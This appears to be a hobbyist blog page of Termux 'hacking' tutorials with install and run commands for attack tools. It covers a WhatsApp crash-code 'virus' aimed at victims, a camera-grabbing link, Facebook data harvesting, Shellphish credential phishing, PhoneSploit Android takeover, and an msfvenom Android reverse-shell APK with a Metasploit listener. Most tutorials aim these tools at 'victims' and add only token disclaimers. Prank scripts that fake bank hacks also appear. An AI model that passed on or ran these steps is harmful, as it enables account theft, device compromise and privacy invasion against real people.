Featured Posts

Thursday 22 October 2020

Website Information Gathering Tool In Termux

 Hello and welcome back my friends,

Today we are come back with another excited Termux script which is RED_HAWK. We can use this tool for scanning vulnerabilities on all website.so without waste more time let's get started....!


About RED_HAWK :-

RED_HAWK is a information gathering tool of all websites made by php language.we can use this script for vulnerability scanning..

Features :-

◆ Basic recon          ◆ Grab banners

◆ Whois lookup      ◆ DNS lookup

◆ Geo-Ip lookup      ◆ Subnet Calculator

◆ Nman port scan  ◆ Subdomain scanner

◆ SQLI scanner       ◆ WordPress scan


How to install :-

$ apt update -y && apt upgrade -y

$ apt install git

$ pkg install php -y

$ git clone https://github.com/Tuhinshubhra/RED_HAWK.git

$ cd RED_HAWK

$ chmod +x rhawk.php

$ php thank.php

Enter the website you wanna scan like www.**********.com

Enter 1 for HTTP

Enter 2 for HTTPS

Choose any number for scan any website.....

I hope these information will be helpful to you..If you found anything new content on here ,share and support Us for future updates..And you can feel free to comment below if you have any doubt or suggestions...Thanks for visit here...Have a nice day..

Termux hacking :-

https://t.me/TermuxOfficial01

Telegram channel :-

https://t.me/DarkStalker01

(Author) Akhilesh_Dmx

Wednesday 16 September 2020

How To Make WHATSAPP Crash Code Using Termux

 Hello guys,

Today i gonna introduce a excited Tutorial which is Whatsapp crash code tool in Termux.. virtex is a shell script based tool using to crash victims whatsapp..they can't open whatsapp if we injected that virus code on their whatsapp number..so without waste more time let's get started...!




How to Install :-


$ apt update && apt upgrade

$ apt install git

$ apt install figlet

$ apt install lolcat

$ git clone https://github.com/ArroKM/VIRTEX

$ cd VIRTEX

$ chmod +x virtex.sh

$ sh virtex.sh

Choose any number to  generate whatsapp crash code...

I hope this information is helpful for you..if you found anything on here and if you have any doubts / suggestions when you can feel free to comment below..thanks for visit.have a nice day...


Telegram Channel:- 

https://t.me/DarkStalker01

Termux Hacking :- 

https://t.me/TermuxOfficial01

(Author) Akhilesh_Dmx

Friday 14 August 2020

How To Install All Linux Various OS In Termux

 Hello guys,today we gonna discuss about Tool-Os script in Termux.this special fact about this tool that we can install 11 Linux distros in Termux..so without waste more time let's get started.....


About Tool-OS :-

This tool using for install 11 Linux various os in Termux /kali/Ubuntu etc...and the main things is when we can get fake rooted access permission in termux..

Installation Cmd :-

$ apt update && apt upgrade

$ apt install python

$ apt install python2

$ apt install git

$ git clone https://github.com/Sanif007/tool-OS

$ cd tool-OS

$ chmod +x os.py

Run :-

$ python2 os.py

I hope this tutorial is useful for you..if you found something interesting information on here share and support us for future updates..and you can feel free to comment below if you have any doubt or suggestions..thanks for visit..have a nice day...

Termux channel :-

https://t.me/TermuxOfficial01

Telegram channel :-

https://t.me/DarkStalker01


(Author) Akhilesh_Dmx


How To Install WishFish In Termux

 Hi guys,

Today we gonna discuss about a interesting tool WishFish using for grab photo..we use this script for access front camera using a link.i am not trying to teach you to hack someone front camera.I just tell the fact that  someone can easily access your camera using like this types tool. so escape like this shit link.no one can access your camera without your permission......

About WishFish :-

WishFish is most powerful Termux script using for access / grab someone front camera using a link..we can get their IMG if they click that link and give allow permission..this link working just 5 or 6 sec after get permission..so don't use this tool for any illegal activity or any other shit..!I just telling about that fact ,if hackers using like this tools for access camera and other shit..you can learn this tool only for educational purpose

How to install :-

$ apt update && apt upgrade

$ apt install openssh

$ apt install git

$ git clone https://github.com/kinghacker0/WishFish

$ chmod +x wishfish.sh

Run :-

$ bash wishfish.sh

I hope this information helpful for you..don't use this script for any illegal activities..this tutorial only for showing how hackers grab or access your front camera using like this link..so recognize that if anyone share you any link like phishing or scamming don't do allow permission..just block it..this link look like👇

Your security in your hand.so don't allow others to infiltrate your device..they can't do anything without your permission..learn this tutorial for escape from hackers..I hope this information helpful for you..if you found something on here and any doubt or suggestions when you can feel free to comment below...thanks for visiting..have a nice day

Telegram Channel :-

https://t.me/DarkStalker01

Termux channel :-

https://t.me/TermuxOfficial01


(Author) Akhilesh_Dmx

Facebook information gathering Tool

 Hello and welcome back my friends,

Today we are come back with another excited Tutorials which is FBI..Fbi is a python based script for knowing information about facebook users..so without waste more time let's get started..

About Fbi :-

FBI Is a python based script using to collect all information about users.You can use this script for getting all information about users like phone number,email,friends..you can get all sensitive information about him/her..and you can also choose bot option for auto comment and reaction on Facebook..and you can remove all friends with one click..


Installation Cmd :-

$ apt update && apt upgrade

$ apt install python 

$ apt install python2

$ apt install git

$ git clone https://github.com/xHak9x/fbi.git

$ cd fbi

$ pip2 install -r requirements.txt

$ chmod +x fbi.py

Run :-

$ python2 fbi.py


I hope this tutorial is helpful for you..if you found something interesting things on here ,don't forget to subscribe/follow ..then you can feel free to comment if you have any doubt or suggestions.share and support us for future updates..use all Tutorials only for educational purpose.. don't use this script for any illegal activities..thanks to visit here..have a nice day

Telegram Channel :- 

https://t.me/DarkStalker01

Termux channel :-

https://t.me/TermuxOfficial01


(Author) Akhilesh_Dmx

Thursday 13 August 2020

How to access whatsapp account/bypass OTP (prank script)

 Hello guys,

Today I gonna show you a very spcl Tutorial which is Whatsapp hacking Tool..but it's not about hacking/cracking..It's just Prank script like previous post ..so without waste more time let's get started..

About HxWhatsApp :-

The author who use python language for make this script..it's just Prank script for fun others..it's look like hacking whatsapp /Bypassing OTP when we run this tool..this tool generate a fake number after we added target number..so it's haven't any illegal activities..hence ,use this script for fun others..

How to install :-

$ apt update && apt upgrade

$ apt install python python2

$ apt install git

$ git clone https://github.com/Bl4ckDr460n/HxWhatsApp.git

$ cd HxWhatsApp

$ chmod +x HxWhatsApp.py

Run:-

$ python2 HxWhatsApp.py

Now you can see Otp code..you can capture this and share it to your friends for prank..I hope this Tutorial is helpful for you.if you found something interesting content in here ,don't forget to share and subscribe for future updates.and you can feel free comment in below if you have any doubt or suggestions..Thanks for visit..have a nice day

Telegram channel :-

https://t.me/DarkStalker01

Termux channel :- 

https://t.me/TermuxOfficial01


(Author) Akhilesh_Dmx

Tuesday 11 August 2020

How To access Bank

 Hello guys,

We are come back with another excited Termux script which is Bank hacking tool...it's just a fun script for prank others..so without waste more time let's get started

About Hack Bank :-

Termux has lot of prank script.but hack bank script completely diffrented to other prank script..we can see bank hacking interface after install this tool..if we run this tool ,when we can see the amount of rupees transfer our account..just screenshot that page share your friends for prank when you did this..you can't use this script for other shit ,only for prank/fun others..

Installation Cmd :-

$ pkg update -y

$ pkg upgrade -y

$ pkg install php

$ pkg install git

$ git clone https://github.com/MrUncle/Script-HackBank

$ cd Script-HackBank

$ chmod +x *

Run :-

$ sh ALLBANK

Note :- This Tutorials only for educational purposes.you can't do any shit using this script

I hope this tutorial useful for you..so use this tutorial for fun others..you can feel free to comment if you have ask any questions or suggestions..share and support us for more updates..thanks for visit.have a nice day..

Telegram channel :- 

https://t.me/DarkStalker01

Termux channel :- 

https://t.me/TermuxOfficial01


(Author) Akhilesh_Dmx

Monday 10 August 2020

How To Make Phishing Links In Termux(Shellphish)

 Hello guys ,and welcome back my blog..Today i gonna show you how to hack someone social media accounts using a link.you can easily access victims account (username & password) using this tool.so without waste more time let's get start our new Tutorial.. 


About Shellphish :-

Shellphish is an interesting tool that helps to access someone social media accounts like 

#facebook

#instagram

#twitter

#gmail etc.....

Shellphish generate a phishing link after choose which social media account we wanna hack...if you choose to hack someone instagram account..and if he opened that link what you generated look like below

Since , you can see here a duplicate page look like instagram..hacker can easily got your account when you logged this link..

Installation Cmd :-

$ pkg update && apt upgrade

$ pkg install git

$ pkg install openssh

$ pkg install php

$ pkg install curl

$ pkg install openssl

$ git clone https://github.com/Ethical-Hacking-Zone/shellphish

$ cd shellphish

$ unzip sites.zip

$ chmod +x shellphish.sh

$ bash shellphish.sh

Now select your option it will generate  which phishing link you wanna sent victim..

I have given all helping cmd for you..hence you can do it in your Terminal without make any mistakes..I hope this Tutorial very helpful for you..don't use this script for any illegal activity..iam not responsible what done by you.so do it only for educational purpose..if you have any doubt or have any suggestions when you can feel free to comment below..and you can join my Telegram channel for getting some Termux skill..

Telegram channel :-


https://t.me/DarkStalker01

Thanks for visiting..have a nice day


(Author) Akhilesh_dmx

How to remotely control any Android Device Using Ip Address Over Wlan

Hello and welcome back friends with my another excited Tutorials..today I gonna introduce PhoneSploit tool using for hack someone android device with ip address over wlang.. so without waste more time let's get started 

About PhoneSploit :-

PhoneSploit is a python v2 based tool in Termux..we install ADB in Termux before PhoneSploit..Adb looking for to access someone ip address who connected same wifi network..

Note :- this tools won't work if  target device haven't connect the same wifi network..!!

Installation Cmd :-

First of all we need to install ADB 

Termux-ADB

 $ wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh

$ ./InstallTools.sh

If this running cmd didn't work..give execute permission then run

( $ chmod +x InstallTools.sh)

Now wait until installation is complete...

It's time we gonna install PhoneSploit .hence,take new section then type below cmd

$ git clone https://github.com/metachar/PhoneSploit

$ pip2 install colorama

Usages:-

$ python2 main_linux.py

Then wait 3 seconds then enter victim ip then exploit...then choose any number for what u wanna done by his device..

I hope this tutorial is helpful for you.if you got something interesting knowledge in our website make sure to subscribe us for more updates.if you have any suggestions or questions you can feel free to comment below..thanks for visiting.have a nice day

Telegram channel :-

https://t.me/DarkStalker01

Termux channel :-

https://t.me/TermuxOfficial01


(Author) Akhilesh_Dmx

Little Brother tool in Termux - (information gathering tool)

Hello guys ,

Welcome to my blog..Today we are going to introduce a instagram lookup tool.. Little brother is a Python programme tool helps to gather information about instagram users..We can use this tool and view and download profile picture of any instagram users.. Without waste more time let's get started....

LittleBrother :-

Some main features of Little Brother tool are given below :-

●Adress lockup phone
●Lockup instagram
●Lockup Facebook Lockup Email
●Lockup Twitter Lockup Google search

Requirements :-

【Linux or Termux internet connection】



Installation :-

$ apt update && apt upgrade -y

$ apt install python3 -y

$ apt install git


$ cd LittleBrother

$ python3 -m pip install -r requirements.txt

$ python3 LittleBrother.py

Now select your options and proceed....

I hope this tutorial helpful to you.if you found something interests content on here or you have any questions and suggestions when you can feel to free comment below...

This Tutorials only for educational purpose.i will not responsible what done bye you..thanks for visiting

Telegram :- 


Termux :- 



(Author) Akhilesh_dmx

Tuesday 21 July 2020

How to remotely control android device using Metasploit-Framework in termux

Hello guys,today I gotta introduce a very important tool in a hacker book that is metasploit framework..We use this tool for connecting payload..We can easily access someone phone using payload.but we need to install metasploit for make a connection between payload and metasploit framework..So without waste more time let's get started......

About Metasploit-Framework :-

Metasploit-Framework is a ruby based penetration testing platform that enables you write test and exploit code.its a essential tool for many attackers and defenders


Installation Cmd :-

$ pkg upgrade && pkg update -y

$ pkg install python python2

$ pkg install git

$ git clone https://github.com/Ethical-Hacking-Zone/T-Lazy

$ ls

$ cd T-Lazy

$ chmod +x install.sh

$ bash install.sh

Usages :-

$ python3 -m pip install requests

$ ls

$ python3 T-Lazy.py

Now choose first one install Metasploit-Framework option.then run that script until you can see successfully installed Metasploit-Framework in your terminal..then you can type 👇

First section :-

$ msfconsole

(For run/install msfconsole)

Second section :-

msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT 4444 R > /storage/emulated/0/Dmx.apk
 
Then back to first section 

(Confirm it when ur in Metasploit-Framework)

So type the following cmds given below :-

● use exploit/multi/handler
● set payload android/meterpreter/reverse_tcp
● set LHOST (your ip)
● set LPORT 4444
● exploit

Type help for more cmd after access his device..🔥

I hope this information helpful for you.if u found something interesting on this blog share and support us for more updates.

This tutorial only for educational purposes. I will not responsible what done by you.join my Telegram channel if you wanna learn more about Termux hacking.

Telegram channel:- TERMUX 【OFFICIAL】

https://t.me/TermuxOfficial01

DARKSTALKER:- 

https://t.me/DarkStalker01

(Author) Akhilesh_dmx